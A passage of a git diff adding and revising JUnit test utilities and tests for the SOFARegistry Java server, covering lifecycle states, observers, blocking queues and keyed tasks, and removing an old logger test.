java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTestBase { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + System.setProperty("spring.profiles.active", "test"); + } + + @Before + public void beforeAbstractTest() throws Exception { + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = + DefaultExecutorFactory.createCachedThreadPoolFactory( + name.getMethodName(), 1, 100, TimeUnit.MILLISECONDS) + .create(); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + private final CyclicBarrier barrier; + + private final CountDownLatch latch; + + private final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/TestScheduler.java b/server/common/util/src/test/java/com/alipay/sofa/registry/TestScheduler.java new file mode 100644 index 000000000..35112a943 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/TestScheduler.java @@ -0,0 +1,23 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry; + +/** + * @author chen.zhu + *

Nov 30, 2020 + */ +public class TestScheduler {} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/TestUtils.java b/server/common/util/src/test/java/com/alipay/sofa/registry/TestUtils.java new file mode 100644 index 000000000..1e7ce9a36 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/TestUtils.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry; + +import com.alipay.sofa.registry.util.StringFormatter; +import org.junit.Assert; + +public class TestUtils { + public static void assertException(Class eclazz, Runnable runnable) { + try { + runnable.run(); + Assert.assertTrue(false); + } catch (Throwable exception) { + Assert.assertEquals(exception.getClass(), eclazz); + } + } + + public static void assertBetween(long v, long low, long high) { + Assert.assertTrue(StringFormatter.format("v={}, low={}"), v >= low); + Assert.assertTrue(StringFormatter.format("v={}, high={}"), v <= high); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/converter/ScopeEnumConverterTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/converter/ScopeEnumConverterTest.java index 480b3c6a0..46dd9851e 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/converter/ScopeEnumConverterTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/converter/ScopeEnumConverterTest.java @@ -25,11 +25,11 @@ * @since 2018/12/28 */ public class ScopeEnumConverterTest { - @Test - public void doTest() { - Assert.assertEquals(ScopeEnum.zone, new ScopeEnumConverter().convertToScope("zone")); - Assert.assertEquals(ScopeEnum.dataCenter, ScopeEnumConverter.convertToScope("dataCenter")); - Assert.assertEquals(ScopeEnum.global, ScopeEnumConverter.convertToScope("global")); - Assert.assertEquals(ScopeEnum.zone, ScopeEnumConverter.convertToScope("other value")); - } + @Test + public void doTest() { + Assert.assertEquals(ScopeEnum.zone, new ScopeEnumConverter().convertToScope("zone")); + Assert.assertEquals(ScopeEnum.dataCenter, ScopeEnumConverter.convertToScope("dataCenter")); + Assert.assertEquals(ScopeEnum.global, ScopeEnumConverter.convertToScope("global")); + Assert.assertEquals(ScopeEnum.zone, ScopeEnumConverter.convertToScope("other value")); + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/LifecycleStateTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/LifecycleStateTest.java new file mode 100644 index 000000000..9c3f82d8f --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/LifecycleStateTest.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +import org.junit.Assert; +import org.junit.Test; + +public class LifecycleStateTest { + + @Test + public void testNext() { + Assert.assertEquals( + LifecycleState.LifecyclePhase.INITIALIZING.next(), + LifecycleState.LifecyclePhase.INITIALIZED); + Assert.assertEquals( + LifecycleState.LifecyclePhase.INITIALIZED.next(), LifecycleState.LifecyclePhase.STARTING); + Assert.assertEquals( + LifecycleState.LifecyclePhase.STARTING.next(), LifecycleState.LifecyclePhase.STARTED); + Assert.assertEquals( + LifecycleState.LifecyclePhase.STARTED.next(), LifecycleState.LifecyclePhase.STOPPING); + Assert.assertEquals( + LifecycleState.LifecyclePhase.STOPPING.next(), LifecycleState.LifecyclePhase.STOPPED); + Assert.assertEquals( + LifecycleState.LifecyclePhase.STOPPED.next(), LifecycleState.LifecyclePhase.DISPOSING); + Assert.assertEquals( + LifecycleState.LifecyclePhase.DISPOSING.next(), LifecycleState.LifecyclePhase.DISPOSED); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleTest.java new file mode 100644 index 000000000..101d45b26 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleTest.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle.impl; + +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.lifecycle.LifecycleController; +import com.alipay.sofa.registry.lifecycle.LifecycleState; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class LifecycleTest { + private static final Logger LOGGER = LoggerFactory.getLogger(LifecycleTest.class); + + @Test + public void testDefaultLifecycleState() { + Lifecycle lifecycle = Mockito.mock(Lifecycle.class); + LifecycleController controller = Mockito.mock(LifecycleController.class); + DefaultLifecycleState state = new DefaultLifecycleState(lifecycle, controller, LOGGER); + Assert.assertTrue(state.isEmpty()); + + Assert.assertFalse(state.isInitializing()); + Assert.assertFalse(state.isInitialized()); + + Assert.assertFalse(state.isStarting()); + Assert.assertFalse(state.isStarted()); + + Assert.assertFalse(state.isStopping()); + // not init, state is stopped and disposed + Assert.assertTrue(state.isStopped()); + + Assert.assertFalse(state.isDisposing()); + Assert.assertTrue(state.isDisposed()); + + Assert.assertFalse(state.isPositivelyDisposed()); + Assert.assertFalse(state.isPositivelyStopped()); + + state.setPhase(LifecycleState.LifecyclePhase.INITIALIZING); + Assert.assertTrue(state.isInitializing()); + Assert.assertFalse(state.isInitialized()); + + state.setPhase(LifecycleState.LifecyclePhase.STARTING); + Assert.assertTrue(state.isStarting()); + Assert.assertFalse(state.isStarted()); + + state.setPhase(LifecycleState.LifecyclePhase.STOPPING); + Assert.assertTrue(state.isStopping()); + Assert.assertFalse(state.isStopped()); + + state.setPhase(LifecycleState.LifecyclePhase.DISPOSING); + Assert.assertTrue(state.isDisposing()); + Assert.assertFalse(state.isDisposed()); + + state.setPhase(LifecycleState.LifecyclePhase.DISPOSED); + Assert.assertTrue(state.isPositivelyDisposed()); + Assert.assertTrue(state.isPositivelyStopped()); + + Assert.assertTrue(state.toString(), state.toString().contains("DISPOSED")); + // rollback to DISPOSING + state.rollback(new RuntimeException()); + Assert.assertTrue(state.toString(), state.toString().contains("DISPOSING")); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/log/LoggerTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/log/LoggerTest.java deleted file mode 100644 index 5f0ab2332..000000000 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/log/LoggerTest.java +++ /dev/null @@ -1,189 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.log; - -import org.junit.Assert; -import org.junit.Test; - -/** - * @author xuanbei - * @since 2018/12/29 - */ -public class LoggerTest { - private static final Logger TRACE_LOGGER = LoggerFactory.getLogger("TRACE-LOGGER"); - private static final Logger DEBUG_LOGGER = LoggerFactory.getLogger("DEBUG-LOGGER"); - private static final Logger INFO_LOGGER = LoggerFactory.getLogger("INFO-LOGGER"); - private static final Logger WARN_LOGGER = LoggerFactory.getLogger("WARN-LOGGER"); - private static final Logger ERROR_LOGGER = LoggerFactory.getLogger("ERROR-LOGGER"); - - @Test - public void levelTest() { - Assert.assertTrue(TRACE_LOGGER.isTraceEnabled()); - Assert.assertTrue(TRACE_LOGGER.isDebugEnabled()); - Assert.assertTrue(TRACE_LOGGER.isInfoEnabled()); - Assert.assertTrue(TRACE_LOGGER.isWarnEnabled()); - Assert.assertTrue(TRACE_LOGGER.isErrorEnabled()); - - Assert.assertFalse(DEBUG_LOGGER.isTraceEnabled()); - Assert.assertTrue(DEBUG_LOGGER.isDebugEnabled()); - Assert.assertTrue(DEBUG_LOGGER.isInfoEnabled()); - Assert.assertTrue(DEBUG_LOGGER.isWarnEnabled()); - Assert.assertTrue(DEBUG_LOGGER.isErrorEnabled()); - - Assert.assertFalse(INFO_LOGGER.isTraceEnabled()); - Assert.assertFalse(INFO_LOGGER.isDebugEnabled()); - Assert.assertTrue(INFO_LOGGER.isInfoEnabled()); - Assert.assertTrue(INFO_LOGGER.isWarnEnabled()); - Assert.assertTrue(INFO_LOGGER.isErrorEnabled()); - - Assert.assertFalse(WARN_LOGGER.isTraceEnabled()); - Assert.assertFalse(WARN_LOGGER.isDebugEnabled()); - Assert.assertFalse(WARN_LOGGER.isInfoEnabled()); - Assert.assertTrue(WARN_LOGGER.isWarnEnabled()); - Assert.assertTrue(WARN_LOGGER.isErrorEnabled()); - - Assert.assertFalse(ERROR_LOGGER.isTraceEnabled()); - Assert.assertFalse(ERROR_LOGGER.isDebugEnabled()); - Assert.assertFalse(ERROR_LOGGER.isInfoEnabled()); - Assert.assertFalse(ERROR_LOGGER.isWarnEnabled()); - Assert.assertTrue(ERROR_LOGGER.isErrorEnabled()); - } - - @Test - public void logTest() { - TRACE_LOGGER.trace("First trace log."); - TRACE_LOGGER.trace("trace log with one parameter {}.", "value1"); - TRACE_LOGGER.trace("trace log with two parameter {}, {}.", "value1", "value2"); - TRACE_LOGGER.trace("trace log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - TRACE_LOGGER.trace("trace log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - TRACE_LOGGER.trace("trace log with throwable.", new RuntimeException( - "trace log with throwable RuntimeException")); - TRACE_LOGGER.trace("trace log with parameter and throwable {} {} {}.", "value1", "value2", - "value3", new RuntimeException( - "trace log with parameter and throwable RuntimeException")); - - Assert.assertTrue(TestAppender.containsMessage("First trace log.")); - Assert.assertTrue(TestAppender.containsMessage("trace log with one parameter value1.")); - Assert.assertTrue(TestAppender - .containsMessage("trace log with two parameter value1, value2.")); - Assert.assertTrue(TestAppender - .containsMessage("trace log with three parameter value1, value2, value3.")); - Assert.assertTrue(TestAppender.containsMessageAndThrowable("trace log with throwable.", - new RuntimeException("trace log with throwable RuntimeException"))); - Assert.assertTrue(TestAppender.containsMessageAndThrowable( - "trace log with parameter and throwable value1 value2 value3.", new RuntimeException( - "trace log with parameter and throwable RuntimeException"))); - - DEBUG_LOGGER.debug("First debug log."); - DEBUG_LOGGER.debug("debug log with one parameter {}.", "value1"); - DEBUG_LOGGER.debug("debug log with two parameter {}, {}.", "value1", "value2"); - DEBUG_LOGGER.debug("debug log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - DEBUG_LOGGER.debug("debug log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - DEBUG_LOGGER.debug("debug log with throwable.", new RuntimeException( - "debug log with throwable RuntimeException")); - DEBUG_LOGGER.debug("debug log with parameter and throwable {} {} {}.", "value1", "value2", - "value3", new RuntimeException( - "debug log with parameter and throwable RuntimeException")); - - Assert.assertTrue(TestAppender.containsMessage("First debug log.")); - Assert.assertTrue(TestAppender.containsMessage("debug log with one parameter value1.")); - Assert.assertTrue(TestAppender - .containsMessage("debug log with two parameter value1, value2.")); - Assert.assertTrue(TestAppender - .containsMessage("debug log with three parameter value1, value2, value3.")); - Assert.assertTrue(TestAppender.containsMessageAndThrowable("debug log with throwable.", - new RuntimeException("debug log with throwable RuntimeException"))); - Assert.assertTrue(TestAppender.containsMessageAndThrowable( - "debug log with parameter and throwable value1 value2 value3.", new RuntimeException( - "debug log with parameter and throwable RuntimeException"))); - - INFO_LOGGER.info("First info log."); - INFO_LOGGER.info("info log with one parameter {}.", "value1"); - INFO_LOGGER.info("info log with two parameter {}, {}.", "value1", "value2"); - INFO_LOGGER.info("info log with three parameter {}, {}, {}.", "value1", "value2", "value3"); - INFO_LOGGER.info("info log with three parameter {}, {}, {}.", "value1", "value2", "value3"); - INFO_LOGGER.info("info log with throwable.", new RuntimeException( - "info log with throwable RuntimeException")); - INFO_LOGGER.info("info log with parameter and throwable {} {} {}.", "value1", "value2", - "value3", - new RuntimeException("info log with parameter and throwable RuntimeException")); - - Assert.assertTrue(TestAppender.containsMessage("First info log.")); - Assert.assertTrue(TestAppender.containsMessage("info log with one parameter value1.")); - Assert.assertTrue(TestAppender - .containsMessage("info log with two parameter value1, value2.")); - Assert.assertTrue(TestAppender - .containsMessage("info log with three parameter value1, value2, value3.")); - Assert.assertTrue(TestAppender.containsMessageAndThrowable("info log with throwable.", - new RuntimeException("info log with throwable RuntimeException"))); - Assert.assertTrue(TestAppender.containsMessageAndThrowable( - "info log with parameter and throwable value1 value2 value3.", new RuntimeException( - "info log with parameter and throwable RuntimeException"))); - - WARN_LOGGER.warn("First warn log."); - WARN_LOGGER.warn("warn log with one parameter {}.", "value1"); - WARN_LOGGER.warn("warn log with two parameter {}, {}.", "value1", "value2"); - WARN_LOGGER.warn("warn log with three parameter {}, {}, {}.", "value1", "value2", "value3"); - WARN_LOGGER.warn("warn log with three parameter {}, {}, {}.", "value1", "value2", "value3"); - WARN_LOGGER.warn("warn log with throwable.", new RuntimeException( - "warn log with throwable RuntimeException")); - WARN_LOGGER.warn("warn log with parameter and throwable {} {} {}.", "value1", "value2", - "value3", - new RuntimeException("warn log with parameter and throwable RuntimeException")); - - Assert.assertTrue(TestAppender.containsMessage("First warn log.")); - Assert.assertTrue(TestAppender.containsMessage("warn log with one parameter value1.")); - Assert.assertTrue(TestAppender - .containsMessage("warn log with two parameter value1, value2.")); - Assert.assertTrue(TestAppender - .containsMessage("warn log with three parameter value1, value2, value3.")); - Assert.assertTrue(TestAppender.containsMessageAndThrowable("warn log with throwable.", - new RuntimeException("warn log with throwable RuntimeException"))); - Assert.assertTrue(TestAppender.containsMessageAndThrowable( - "warn log with parameter and throwable value1 value2 value3.", new RuntimeException( - "warn log with parameter and throwable RuntimeException"))); - - ERROR_LOGGER.error("First error log."); - ERROR_LOGGER.error("error log with one parameter {}.", "value1"); - ERROR_LOGGER.error("error log with two parameter {}, {}.", "value1", "value2"); - ERROR_LOGGER.error("error log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - ERROR_LOGGER.error("error log with three parameter {}, {}, {}.", "value1", "value2", - "value3"); - ERROR_LOGGER.error("error log with throwable.", new RuntimeException( - "error log with throwable RuntimeException")); - ERROR_LOGGER.error("error log with parameter and throwable {} {} {}.", "value1", "value2", - "value3", new RuntimeException( - "error log with parameter and throwable RuntimeException")); - - Assert.assertTrue(TestAppender.containsMessage("First error log.")); - Assert.assertTrue(TestAppender.containsMessage("error log with one parameter value1.")); - Assert.assertTrue(TestAppender - .containsMessage("error log with two parameter value1, value2.")); - Assert.assertTrue(TestAppender - .containsMessage("error log with three parameter value1, value2, value3.")); - Assert.assertTrue(TestAppender.containsMessageAndThrowable("error log with throwable.", - new RuntimeException("error log with throwable RuntimeException"))); - Assert.assertTrue(TestAppender.containsMessageAndThrowable( - "error log with parameter and throwable value1 value2 value3.", new RuntimeException( - "error log with parameter and throwable RuntimeException"))); - } -} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/log/TestAppender.java b/server/common/util/src/test/java/com/alipay/sofa/registry/log/TestAppender.java deleted file mode 100644 index 0a765cffb..000000000 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/log/TestAppender.java +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.log; - -import ch.qos.logback.classic.spi.LoggingEvent; -import ch.qos.logback.core.AppenderBase; - -import java.util.ArrayList; -import java.util.List; - -/** - * @author xuanbei - * @since 2018/12/29 - */ -public class TestAppender extends AppenderBase { - public static List events = new ArrayList<>(); - - @Override - protected void append(LoggingEvent e) { - events.add(e); - } - - public static boolean containsMessage(String message) { - for (LoggingEvent loggingEvent : events) { - if (loggingEvent.getFormattedMessage().contains(message)) { - return true; - } - } - - return false; - } - - public static boolean containsMessageAndThrowable(String message, Throwable throwable) { - for (LoggingEvent loggingEvent : events) { - if (loggingEvent.getFormattedMessage().contains(message) - && loggingEvent.getThrowableProxy().getMessage().equals(throwable.getMessage())) { - return true; - } - } - - return false; - } -} \ No newline at end of file diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservableTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservableTest.java new file mode 100644 index 000000000..59bf9ea32 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservableTest.java @@ -0,0 +1,54 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.observer.impl; + +import com.alipay.sofa.registry.lifecycle.LifecycleController; +import com.alipay.sofa.registry.lifecycle.LifecycleState; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import java.util.concurrent.atomic.AtomicBoolean; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class AbstractLifecycleObservableTest { + @Test + public void test() { + LifecycleState lifecycleState = Mockito.mock(LifecycleState.class); + LifecycleController lifecycleController = Mockito.mock(LifecycleController.class); + AbstractLifecycleObservable observable = + new AbstractLifecycleObservable(lifecycleState, lifecycleController); + final AtomicBoolean called = new AtomicBoolean(); + UnblockingObserver o = + new UnblockingObserver() { + @Override + public void update(Observable source, Object message) { + called.set(true); + throw new RuntimeException(); + } + }; + observable.addObserver(o); + Assert.assertEquals(1, observable.observers.size()); + observable.removeObserver(o); + Assert.assertEquals(0, observable.observers.size()); + observable.removeObserver(o); + observable.addObserver(o); + Assert.assertFalse(called.get()); + observable.notifyObservers("test"); + Assert.assertTrue(called.get()); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/task/BlockingQueuesTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/task/BlockingQueuesTest.java new file mode 100644 index 000000000..9755d1b67 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/task/BlockingQueuesTest.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class BlockingQueuesTest { + @Test + public void test() { + BlockingQueues queues = new BlockingQueues(2, 2, true); + Assert.assertEquals(queues.queueNum(), 2); + Assert.assertEquals(queues.getTotalQueueSize(), 0); + // avgSize=1 + // size queues.put(0, new Object())); + + // size queues.put(1, new Object())); + Assert.assertEquals(queues.getTotalQueueSize(), 3); + Assert.assertEquals(queues.getQueue(0).size(), 2); + Assert.assertEquals(queues.getQueue(1).size(), 1); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/task/KeyedTaskTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/task/KeyedTaskTest.java new file mode 100644 index 000000000..e6abb8580 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/task/KeyedTaskTest.java @@ -0,0 +1,90 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.TestUtils; +import java.util.concurrent.atomic.AtomicInteger; +import org.junit.Assert; +import org.junit.Test; + +public class KeyedTaskTest { + + @Test + public void testRun() { + KeyedTask task = + new KeyedTask( + "test", + () -> { + throw new RuntimeException(); + }); + task.run(); + Assert.assertTrue(task.isFinished()); + Assert.assertFalse(task.isSuccess()); + Assert.assertTrue(task.isFailed()); + + task = + new KeyedTask( + "test", + () -> { + throw new TaskErrorSilenceException(); + }); + task.run(); + Assert.assertTrue(task.isFinished()); + Assert.assertFalse(task.isSuccess()); + Assert.assertTrue(task.isFailed()); + + Assert.assertFalse(task.isOverAfter(1000000)); + Assert.assertTrue(task.isOverAfter(0)); + } + + @Test + public void testCancel() { + final AtomicInteger count = new 